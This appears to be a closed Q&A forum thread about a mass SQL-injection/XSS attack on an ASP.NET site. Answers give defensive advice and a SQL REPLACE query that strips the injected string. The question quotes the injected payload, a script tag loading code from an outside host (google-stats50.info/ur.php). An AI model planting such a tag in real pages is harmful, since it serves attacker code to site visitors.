XSS Attack on the ASP.NET Website [closed]

5
votes

I am in a very big trouble. Please help!!!!!!!!!!

My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.

My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.

Please help.

Thanks in advance!!!!!!

5
asp.netsql-serversql-injection

5 Answers

4
votes

When you render the text from the database you can use two ways to avoid this script.

  1. User Server.HtmlEncode(DataFromDatabase);
  2. Use the Microsoft Anti-Cross dll library that have a similar function with more options.

Last MS Anti-XSS library now is 3.1.
How to using video

How they pass this script.

  1. On the contact or other forms.
  2. On the browser reference on the statistics and when they browse your site, you keep a log about this and when you go to see this log the script is running.

Hope this help.

2
votes

Shut down the site. Your server may or may not be screwed now.

You have to find out where the changes are coming from - Database or File system

If it's the DB then you may be ok, someone is probably using sql injection. Set permissions so that the DB cannot be updated by the site for now until you find the SQL INJECTION point.

If it's your file system then you probably need to clear and reset the site. They are in and you won't get rid of them. Find your entry point, but it will be hard.

0
votes

I would recommend that you remove all extern hostheader binding in the IIS. That allows you to locate the problem locally without any client of yours might be infected/be stolen from

0
votes

A Quick remedy

Following is not a solution, but with this you can remove the script from the database in a single query. Thats what i do for now :).

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'http://google-stats49.info/ur.php>', ' ')

This one works like the find and replace stuff in word. If you find any ware abouts about the virus script, do post it here.

Regards, Masood

0
votes

same problem here... it started about 15.30 and infect 4 tables... here is solution for full database search: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html just edit it to return distinct table names.

and this will work as Masood mention

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')